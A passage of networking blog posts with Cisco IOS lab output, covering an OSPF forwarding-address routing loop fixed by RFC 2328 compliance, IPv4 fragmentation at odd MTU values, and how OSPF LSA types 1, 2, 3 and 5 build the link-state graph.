Route metric is 1, traffic share count is 1
Route tag 6
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/35/56 ms
Since both routes are E2, R1 selects the best one based on the cost towards Forwarding Address:
R1#sho ip ospf database external | include Link State ID|Network Mask|Forward Address|LS Type
LS Type: AS External Link
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Forward Address: 10.1.46.6
LS Type: AS External Link
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Forward Address: 10.2.56.6
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
Known via "ospf 1", distance 110, metric 1002, type inter area
Last update from 192.168.13.3 on FastEthernet0/1, 00:01:10 ago
Routing Descriptor Blocks:
* 192.168.13.3, from 3.3.3.3, 00:01:10 ago, via FastEthernet0/1
Route metric is 1002, traffic share count is 1
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
Known via "ospf 1", distance 110, metric 12, type inter area
Last update from 192.168.12.2 on FastEthernet0/0, 00:10:25 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 2.2.2.2, 00:10:25 ago, via FastEthernet0/0
Route metric is 12, traffic share count is 1
There is only one tiny addition pending: let’s configure a loopback on ASBR2 with an address from 10.2.0.0/16 range:
ASBR2#sho run interface loopback 1
interface Loopback1
ip address 10.2.2.2 255.255.255.255
An update worthy of an EOBD on Friday:
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
.....
Success rate is 0 percent (0/5)
BANG! Network connectivity is lost. Guess what’s happening?..
R1#traceroute 6.6.6.6 source loopback 0
Type escape sequence to abort.
Tracing the route to 6.6.6.6
VRF info: (vrf in name/id, vrf out name/id)
1 192.168.13.3 28 msec 16 msec 20 msec
2 192.168.13.1 24 msec 20 msec 20 msec
3 192.168.13.3 36 msec 40 msec 40 msec
4 192.168.13.1 40 msec 40 msec 40 msec
<you get the point>
Let’s peek at R1’s point of view on the network:
R1#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 3
Last update from 192.168.13.3 on FastEthernet0/1, 00:04:17 ago
Routing Descriptor Blocks:
* 192.168.13.3, from 5.5.5.5, 00:04:17 ago, via FastEthernet0/1
Route metric is 1, traffic share count is 1
Route tag 6
R1#
R1#show ip ospf database external | include Link State ID|Network Mask|Metric|Forward
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.1.46.6
Link State ID: 6.6.6.6 (External Network Number )
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.2.56.6
R1#
R1#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
Known via "ospf 1", distance 110, metric 12, type inter area
Last update from 192.168.12.2 on FastEthernet0/0, 00:22:00 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 2.2.2.2, 00:22:00 ago, via FastEthernet0/0
Route metric is 12, traffic share count is 1
R1#
R1#show ip route 10.2.56.6
Routing entry for 10.2.0.0/16
Known via "ospf 1", distance 110, metric 3, type inter area
Last update from 192.168.13.3 on FastEthernet0/1, 00:05:51 ago
Routing Descriptor Blocks:
* 192.168.13.3, from 3.3.3.3, 00:05:51 ago, via FastEthernet0/1
Route metric is 3, traffic share count is 1
Clearly it has changed its mind regarding the best path towards 6.6.6.6/32, flipping from ASBR1 to ASBR2. You probably already know what’s happening on ABR2 mind?
ABR2#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 13
Last update from 192.168.13.1 on FastEthernet0/1, 00:17:24 ago
Routing Descriptor Blocks:
* 192.168.13.1, from 4.4.4.4, 00:17:24 ago, via FastEthernet0/1
Route metric is 1, traffic share count is 1
Route tag 6
ABR2#
ABR2#show ip os database external | include Link State ID|Netowrk Mask|Metric|Forward
Link State ID: 6.6.6.6 (External Network Number )
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.1.46.6
Link State ID: 6.6.6.6 (External Network Number )
Metric Type: 2 (Larger than any link state path)
Metric: 1
Forward Address: 10.2.56.6
ABR2#
ABR2#show ip route 10.1.46.6
Routing entry for 10.1.0.0/16
Known via "ospf 1", distance 110, metric 13, type inter area
Last update from 192.168.13.1 on FastEthernet0/1, 00:27:01 ago
Routing Descriptor Blocks:
* 192.168.13.1, from 2.2.2.2, 00:27:01 ago, via FastEthernet0/1
Route metric is 13, traffic share count is 1
ABR2#
ABR2#show ip route 10.2.56.6
Routing entry for 10.2.56.0/24
Known via "ospf 1", distance 110, metric 1001, type intra area
Last update from 192.168.35.5 on FastEthernet0/0, 00:18:04 ago
Routing Descriptor Blocks:
* 192.168.35.5, from 5.5.5.5, 00:18:04 ago, via FastEthernet0/0
Route metric is 1001, traffic share count is 1
ABR2 compares costs towards ASBRs and decides to forward traffic to ASBR1 via R1, hence the loop. Now let’s turn on RFC 2328 compliance on ABR2 – it would use the worst metric out of aggregated subnets thus the path towards Forwarding Address could only become better, not the other way around.
And – poof! – R1 can select an appropriate path once again:
R1#ping 6.6.6.6 source loopback 0
Type escape sequence to abort.
Sending 5, 100-byte ICMP Echos to 6.6.6.6, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!!!!!
Success rate is 100 percent (5/5), round-trip min/avg/max = 12/28/40 ms
R1#
R1#show ip route 6.6.6.6
Routing entry for 6.6.6.6/32
Known via "ospf 1", distance 110, metric 1
Tag 6, type extern 2, forward metric 12
Last update from 192.168.12.2 on FastEthernet0/0, 00:01:10 ago
Routing Descriptor Blocks:
* 192.168.12.2, from 4.4.4.4, 00:01:10 ago, via FastEthernet0/0
Route metric is 1, traffic share count is 1
Route tag 6
The creepy part is that RFC 1583 compliant devices have been widely deployed since the inception of the standard, including Cisco IOS, Juniper JunOS, Huawei VRR. Obviously, this is done for the sake of backwards-compatibility because other products implement RFC 2328 by default (e.g. Arista EOS, Cisco NX-OS). Still, the ease of creating a loop with an innocent configuration is something to watch out for. The solution is rather simple though: either enable RFC 2328 or deploy OSPF in a KISS way: no virtual links, NSSA, FA or other CCIE-beloved stuff.
Good old IPv4… It is as ubiquitous in networking world as the air is on the Earth. Although folks around the world use it on a daily basis, IPv4 still has a few surprises up its sleeve. Today we’re going to peek at one of them.
Here is the topology of four routers lined up in a row:
R2#show run | section router|interface FastEthernet
interface FastEthernet0/0
ip address 192.168.12.2 255.255.255.0
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
router eigrp 1
network 0.0.0.0
By default, IP MTU on each link is equal to 1500. This means that the acceptable IP packet size, including headers and payload, can be up to 1500 bytes; if a packet is too big, it has to be fragmented. Suppose the MTU of R2-R3 link is equal to 1400 bytes on both ends:
R2#show run interface fastEthernet0/1
interface FastEthernet0/1
ip address 192.168.23.2 255.255.255.0
ip mtu 1400
How many fragments would a 1500-byte packet produce?
R1#ping 4.4.4.4 source 1.1.1.1 size 1500 repeat 1
Type escape sequence to abort.
Sending 1, 1500-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 68/68/68 ms
It’s pretty easy to devise that 1500-byte packet should result in 2 fragments for MTU of 1400 bytes. However, why are there 2 fragments for ICMP echo reply? Well, it turns out that ICMP is in fact supposed to work this way:
The data received in the echo message must be returned in the echo reply message.
RFC792
Let’s reduce R2-R3 MTU down to 700 bytes on both ends and check whether we can squeeze exactly two fragments of 700 bytes through it. IP header is 20 bytes long so the initial payload should be 680*2 + 20 = 1380 bytes (IP MTU includes the header, remember?).
R1#ping 4.4.4.4 source 1.1.1.1 size 1380 repeat 1
Type escape sequence to abort.
Sending 1, 1380-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms
Now for the high spot of the testing: magical MTU value of 725.
R1#ping 4.4.4.4 source 1.1.1.1 size 1430 repeat 1
Type escape sequence to abort.
Sending 1, 1430-byte ICMP Echos to 4.4.4.4, timeout is 2 seconds:
Packet sent with a source address of 1.1.1.1
!
Success rate is 100 percent (1/1), round-trip min/avg/max = 48/48/48 ms
Let’s break down the initial packet: 20 bytes header, 1410 bytes of payload that result… in 3 fragments? Shouldn’t 1410 bytes perfectly fit into 705 allowed payload for fragments?
Frankly speaking, 725 is as special as any number not divisible by 8. The catch is called Fragment Offset field that regulates relative position of fragment payload within the initial data.
Fragment offset is measured in units of 8 bytes. Since 705 is not divided by 8, router chooses the closest value to 705 bytes – 704.
The exact sizing of fragmentation is not determined by RFC. In this particular case R2 chooses to put 8 bytes in the 2nd fragment and leave the rest 698 bytes for the last one.
In the end, hosts try to avoid fragmentation at all by various means: PMTUD, TCP MSS to name a few. Such a behaviour makes issues with unpredictable size of fragments even less likely to occur in real life. However, sometimes one needs a reason to justify learning IP headers, er?..
It’s not a secret that OSPF is a link-state routing protocol: it collects topology information, builds a graph and runs Dijkstra algorithm to determine the shortest path. Topology information is the data one would collect anyway to find the best path with a pen and a piece of paper: it includes nodes, their interfaces and subnets besides certain operational facts (e.g., flags). OSPF organizes this data into structures called LSA – link-state advertisement. SPF algorithm is also well-known to IT community, it can be found in almost any academical curriculum nowadays.
LSA roles are well described in various articles and notes: router LSA for nodes, network LSA for broadcast segment, summary LSA for inter-area information transfer… However, I find it relatively difficult to assemble all these pieces into a holistic puzzle called graph. I admit that RFC must hold the ultimate truth and thus the extensive description of the process, but this knowledge has evaded me for quite some time. This is the reason for this article: I’d like to share my understanding of LSA roles and how to build the graph out of LSDB.
The basis for this discussion is the following topology:
This time I’m going to build the network almost from scratch, examining the effects caused by every significant configuration change. The preparation includes only addressing setup (R5 listed as an example):
R5(config)#interface Loopback0
R5(config-if)# ip address 5.5.5.5 255.255.255.255
R5(config)#interface FastEthernet0/1
R5(config-if)# ip address 192.168.45.5 255.255.255.0
R5(config-if)# no shutdown
LSA1: router LSA
In order to build a graph, one should decide which type of graph is going to be built. According to RFC 2328 section 2.1 OSPF operates with a directed graph: vertices for networks and routers, edges for connections between them. OSPF uses the cost of an output interface as an edge weight (section 2.1.2), thus the directed graph is also a weighted one.
Let’s start with a vertex for R1:
R1(config)#router ospf 1
R1#show ip ospf database
OSPF Router with ID (1.1.1.1) (Process ID 1)
Nothing yet in LSDB as IOS requires at least one interface to be active for OSPF process to initialize. Although it makes sense, it doesn’t help us with graph construction. At this stage it would look like this:
Let’s make IOS happy and add 1.1.1.1/32 to the mix:
R1(config)#router ospf 1
R1(config-router)#router-id 1.1.1.1
R1(config-router)#network 1.1.1.1 0.0.0.0 area 0
R1#
R1#show ip ospf database
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 21 0x80000001 0x00D055 1
We’ve got ourselves the first LSA1. Before looking at its contents, we shall peek at the format first:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS age | Options | 1 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link State ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Advertising Router |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS sequence number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS checksum | length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0 |V|E|B| 0 | # links |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link Data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Type | # TOS | metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TOS | 0 | TOS metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link Data |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
The header of LSA1 allows building a vertex for a router, using Link State ID (or Advertising Router) field. The rest of LSA1 (omitting options and flags) is dedicated to networks (vertices) and links (edges). There are 4 types of links available:
point-to-point;
transit;
stub;
virtual.
Let’s see which type of link we have so far:
R1#show ip ospf database router 1.1.1.1
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
LS age: 55
Options: (No TOS-capability, DC)
LS Type: Router Links
Link State ID: 1.1.1.1
Advertising Router: 1.1.1.1
LS Seq Number: 80000001
Checksum: 0xD055
Length: 36
Number of Links: 1
Link connected to: a Stub Network
(Link ID) Network/subnet number: 1.1.1.1
(Link Data) Network Mask: 255.255.255.255
Number of MTID metrics: 0
TOS 0 Metrics: 1
The 1.1.1.1/32 network is a stub link where end devices usually reside. Such an entity is designed to be a leaf node of the graph, thus no OSPF routers are expected in such a subnet. Stub link is represented by a vertex with a single edge for each direction, connecting to a router node.
This link type has all the necessary information for its part of the graph: network, mask and egress cost (ingress cost is always zero). Adjacent router can be derived from LSA1 header (LSID); however, there is no restriction for the same network vertex to anchor to different router nodes thus enabling ECMP.
The next link type is point-to-point network: it describes a connection to another router. Let’s enable OSPF on R2 and establish adjacency over R1-R2 link using P2P link:
R1#show ip ospf database
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 41 0x8000001D 0x00B441 3
2.2.2.2 2.2.2.2 42 0x80000001 0x0055CC 2
As expected, a new LSA1, corresponding to R2, is created. However, notice the “odd” link count change: OSPF was enabled on a single interface, but the number of links increased by 2 in each of the LSAs.
R1#show ip ospf database router 1.1.1.1
OSPF Router with ID (1.1.1.1) (Process ID 1)
Router Link States (Area 0)
LS age: 283
Options: (No TOS-capability, DC)
LS Type: Router Links
Link State ID: 1.1.1.1
Advertising Router: 1.1.1.1
LS Seq Number: 8000001D
Checksum: 0xB441
Length: 60
Number of Links: 3
Link connected to: a Stub Network
(Link ID) Network/subnet number: 1.1.1.1
(Link Data) Network Mask: 255.255.255.255
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: another Router (point-to-point)
(Link ID) Neighboring Router ID: 2.2.2.2
(Link Data) Router Interface address: 192.168.12.1
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: a Stub Network
(Link ID) Network/subnet number: 192.168.12.0
(Link Data) Network Mask: 255.255.255.0
Number of MTID metrics: 0
TOS 0 Metrics: 1
A single interface with IP network assigned creates 2 entities: a stub network (it’s an addressable subnet after all) and a point-to-point link corresponding to a graph edge between router vertices. An adjacent router node is referenced by LSID so that the edge for bidirectional connectivity between nodes could be correctly described with a pair of LSA1. Two-way adjacency is crucial for the edge between router vertices, although the cost for each direction might differ. Next-hop for IP forwarding is also readily available from link data for point-to-point connections.
Since the costs of the links are left by default and thus are equal, the following graph is formed:
Virtual link is out of scope of this article since it’s considered an ad-hoc crutch for extinguishing immediate fires rather than a permanent solution within proper design. However, it’s still a curious entity starting from OSPFv2 so if you’re eager to spent some time with it, there is a relevant article by Petr Lapukhov.
There is only one link type left: transit link (don’t mix with transit capability!).
LSA2: network LSA
Point-to-point connections are able to describe direct links between routers; however, there could be L2 segments that might be either broadcast-capable (e.g., Ethernet) or NBMA (e.g., DMVPN). The latter type usually employs a bundle of logical point-to-point adjacencies since the logical topology is hub-and-spoke, so these connections are easily modelled in OSPF already.
Broadcast medium, however, poses a scalability inefficiency and thus requires a different approach. Consider the Ethernet segment between R2, R3 and R4. Obviously, it is impossible to have an edge that connects more than 2 nodes. Although routers could establish direct adjacencies, it would not scale very well because the number of connections would grow as O(n2) resulting in higher CPU and RAM usage.
The optimization idea is simple: introduce a single pseudo-node that every router in L2 segment would connect to. Such an approach reduces the number of active adjacencies from O(n2) to O(n), increasing scalability in the end. The router, responsible for maintaining pseudo-node, is called a designated router (DR); the vertex that corresponds to a pseudo-node is described by LSA2; the edge towards a pseudo-node is defined by transit link in LSA1 and contents of LSA2.
Let’s enable OSPF on R2, R3 and R4, leaving the OSPF network type as is (broadcast by default):
R2(config)#interface f0/0
R2(config-if)#ip ospf 1 area 0
R2#show ip ospf neighbor
Neighbor ID Pri State Dead Time Address Interface
3.3.3.3 1 FULL/BDR 00:00:38 192.168.234.3 FastEthernet0/0
4.4.4.4 1 FULL/DR 00:00:35 192.168.234.4 FastEthernet0/0
1.1.1.1 0 FULL/ - 00:00:35 192.168.12.1 FastEthernet0/1
R2#
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 538 0x80000022 0x00AA46 3
2.2.2.2 2.2.2.2 116 0x80000008 0x005804 3
3.3.3.3 3.3.3.3 118 0x80000002 0x004228 1
4.4.4.4 4.4.4.4 117 0x80000002 0x00045D 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 117 0x80000001 0x00F0B8
As we can see, LSA2 is indeed issued by R4 (4.4.4.4) who is currently a DR. The simplified election process is straightforward:
build a list of routers participating in the election (non-zero priority);
select highest priority;
select highest RID.
Backup DR (BDR) is elected in the same way as DR with a subtle difference: elected DR cannot be preempted while BDR can. Since DR is responsible for pseudo-node, this router synchronizes the LSDB with every node is a segment, reaching FULL state of adjacency. BDR behaves the same as DR except generating LSA2 thus trying to minimize the disruption caused by DR failure.
Let’s take a look at LSA1 first:
R2#show ip ospf database router 2.2.2.2
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
LS age: 425
Options: (No TOS-capability, DC)
LS Type: Router Links
Link State ID: 2.2.2.2
Advertising Router: 2.2.2.2
LS Seq Number: 8000000F
Checksum: 0x4A0B
Length: 60
Number of Links: 3
Link connected to: a Transit Network
(Link ID) Designated Router address: 192.168.234.4
(Link Data) Router Interface address: 192.168.234.2
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: another Router (point-to-point)
(Link ID) Neighboring Router ID: 1.1.1.1
(Link Data) Router Interface address: 192.168.12.2
Number of MTID metrics: 0
TOS 0 Metrics: 1
Link connected to: a Stub Network
(Link ID) Network/subnet number: 192.168.12.0
(Link Data) Network Mask: 255.255.255.0
Number of MTID metrics: 0
TOS 0 Metrics: 1
At last, we meet the transit link. As you might have guessed, DR ID corresponds to LSA2 LSID and is equal to DR IP address. As with point-to-point links, next-hop IP address and cost are also present in this data structure. However, the LSA1 still does not fully describe the two-way connectivity as there is only a half of information required for building an edge. Besides, IP addressing for L2 segment is missing. Let’s peek at LSA2 format:
LSA2 should contain the missing pieces of the puzzle: a list of connected RIDs and the network mask.
R2#show ip ospf database network
OSPF Router with ID (2.2.2.2) (Process ID 1)
Net Link States (Area 0)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 459
Options: (No TOS-capability, DC)
LS Type: Network Links
Link State ID: 192.168.234.4 (address of Designated Router)
Advertising Router: 4.4.4.4
LS Seq Number: 80000002
Checksum: 0xEEB9
Length: 36
Network Mask: /24
Attached Router: 4.4.4.4
Attached Router: 2.2.2.2
Attached Router: 3.3.3.3
Now we have all the information needed to extend the graph using transit segment:
A few things are worth mentioning here. First is zero egress cost from the pseudo-node, it does not introduce any penalty to path calculation. Second, subnet information is embedded in LSA2: mask is listed explicitly and network itself can be derived using LSID and the prefix length.
it eliminates stub link types on point-to-point adjacencies;
it assigns /32 mask to LSA2 as a special indicator to ignore the subnet; the worst-case scenario – DR IP address would be reachable but not the whole subnet.
Using LSA1 and LSA2 data structures, it’s possible to create a graph that describes the whole OSPF area. However, there is also a notion of external prefixes and several areas in OSPF – that’s where we’re headed next.
LSA5: AS-external LSA
This LSA is pretty straightforward: it announces an external subnet, mask and a few knobs to make life easier (no). The format is shown below:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS age | Options | 5 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link State ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Advertising Router |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS sequence number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS checksum | length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Network Mask |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|E| 0 | metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Forwarding address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| External Route Tag |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|E| TOS | TOS metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Forwarding address |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| External Route Tag |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
LSID is equal to network number, mask and metric are listed explicitly… Everything is there to build a vertex and corresponding edges, pretty much like stub networks in LSA1. If you want to know more about Forwarding address (FA), check out this blog and links for a series dedicated to LSA5 FA and its effects, although sometimes they might prove somewhat useful. For the rest of the data, RFC 2338 section A.4.5 is more than enough.
In our topology R3 is the one to generate LSA5 with loopback redistribution:
R3(config)#router ospf 1
R3(config-router)#redistribute connected subnets
R3#
R3#show ip ospf database
OSPF Router with ID (3.3.3.3) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 441 0x80000025 0x00A449 3
2.2.2.2 2.2.2.2 962 0x80000011 0x00460D 3
3.3.3.3 3.3.3.3 23 0x80000009 0x003A27 1
4.4.4.4 4.4.4.4 1085 0x8000000A 0x00F365 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 835 0x80000004 0x00EABB
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 2 0x80000001 0x000385 0
R3#
R3#show ip ospf database external
OSPF Router with ID (3.3.3.3) (Process ID 1)
Type-5 AS External Link States
LS age: 38
Options: (No TOS-capability, DC, Upward)
LS Type: AS External Link
Link State ID: 3.3.3.3 (External Network Number )
Advertising Router: 3.3.3.3
LS Seq Number: 80000001
Checksum: 0x385
Length: 36
Network Mask: /32
Metric Type: 2 (Larger than any link state path)
MTID: 0
Metric: 20
Forward Address: 0.0.0.0
External Route Tag: 0
Keep in mind that LSA5 is flooded within the whole AS, not just OSPF area. In order to build the graph further, we need a vertex (LSA5 LSID) and an edge (Advertising Router) along with its weight:
That’s it for LSA5 role in the graph. Almost.
LSA3: summary LSA
Let’s switch to inter-area communication for a moment. Beware of the first thought: this LSA is not intended for prefix summarization in the usual sense. It is used to summarize topology information from another area: LSA1 and LSA2, used for building a graph, are not transferred between areas but morphed into LSA3 based on LSDB or RIB contents (more on that later). LSA3 format is shown below:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS age | Options | 3 |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Link State ID |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Advertising Router |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS sequence number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| LS checksum | length |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Network Mask |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| 0 | metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| TOS | TOS metric |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| ... |
The idea is pretty much the same as with LSA5: transfer network (LSA3 LSID), mask and corresponding metric to another area. In order to conserve computing resources of the routers and thus make OSPF AS more scalable, there is no topology information exchanged between areas and multi-area OSPF acts as a distance-vector (DV) routing protocol. This is the reason why some authors call this IGP a hybrid one (EIGRP is a pure DV IGP although quite advanced). DV logic usually requires some loop prevention mechanism like split-horizon, DUAL and so on. OSPF, however, employs a completely different logic: LSA3 can cross an area border only when one of the areas is area 0 aka backbone area. This concept allows creation of a small tree: area 0 is the root while all other areas are on the same level below area 0. It is obvious that no routing loops can occur between areas in such a setup as there is always only a single path available – through backbone.
R5(config)#router ospf 1
R5(config-router)#router-id 5.5.5.5
R5(config)#intreface f0/1
R5(config-if)#ip ospf 1 area 1
R5(config-if)#ip ospf network point-to-point
R5(config)#interface lo 1
R5(config-if)#ip address 5.5.5.5 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R5(config)#interface lo 2
R5(config-if)#ip address 5.5.5.55 255.255.255.255
R5(config-if)#ip ospf 1 area 1
R2#show ip ospf database
OSPF Router with ID (2.2.2.2) (Process ID 1)
Router Link States (Area 0)
Link ID ADV Router Age Seq# Checksum Link count
1.1.1.1 1.1.1.1 782 0x80000027 0x00A04B 3
2.2.2.2 2.2.2.2 1339 0x80000013 0x00420F 3
3.3.3.3 3.3.3.3 422 0x8000000B 0x003629 1
4.4.4.4 4.4.4.4 252 0x8000000D 0x00F064 1
Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
192.168.234.4 4.4.4.4 1235 0x80000006 0x00E6BD
Summary Net Link States (Area 0)
Link ID ADV Router Age Seq# Checksum
5.5.5.5 4.4.4.4 170 0x80000001 0x003ED8
5.5.5.55 4.4.4.4 156 0x80000001 0x00489C
192.168.45.0 4.4.4.4 242 0x80000001 0x00781D
Type-5 AS External Link States
Link ID ADV Router Age Seq# Checksum Tag
3.3.3.3 3.3.3.3 422 0x80000003 0x00FE87 0
As expected, prefixes from area 1 are seen through LSA3. R4, being an ABR, is listed as an advertising router. From backbone point of view, all these prefixes are directly connected to R4 thus maintaining area 1 topology concealment.
R2#show ip ospf database summary adv-router 4.4.4.4
OSPF Router with ID (2.2.2.2) (Process ID 1)
Summary Net Link States (Area 0)
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 823
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(Network)
Link State ID: 5.5.5.5 (summary Network Number)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x3ED8
Length: 28
Network Mask: /32
MTID: 0 Metric: 2
Routing Bit Set on this LSA in topology Base with MTID 0
LS age: 809
Options: (No TOS-capability, DC, Upward)
LS Type: Summary Links(Network)
Link State ID: 5.5.5.55 (summary Network Number)
Advertising Router: 4.4.4.4
LS Seq Number: 80000001
Checksum: 0x489C
Length: 28
Network Mask: /32
